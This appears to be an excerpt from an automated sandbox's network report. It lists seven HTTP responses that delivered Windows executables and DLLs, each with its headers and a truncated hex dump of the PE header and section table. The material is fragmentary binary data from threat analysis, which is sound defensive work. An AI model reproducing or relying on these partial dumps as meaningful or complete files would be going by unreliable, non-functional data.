Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:17 GMTContent-Type: application/octet-streamContent-Length: 8684256Last-Modified: Tue, 03 Sep 2024 13:26:30 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70e86-8482e0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a8 b8 50 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 08 80 00 00 9e 03 00 00 00 00 00 ce 26 80 00 00 20 00 00 00 40 80 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 84 00 00 04 00 00 49 b2 84 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 26 80 00 4b 00 00 00 00 60 80 00 d6 97 03 00 00 00 00 00 00 00 00 00 00 aa 83 00 e0 d8 00 00 00 00 84 00 0c 00 00 00 36 26 80 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 06 80 00 00 20 00 00 00 08 80 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 a0 02 00 00 00 40 80 00 00 04 00 00 00 0c 80 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d6 97 03 00 00 60 80 00 00 98 03 00 00 10 80 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 84 00 00 02 00 00 00 a8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
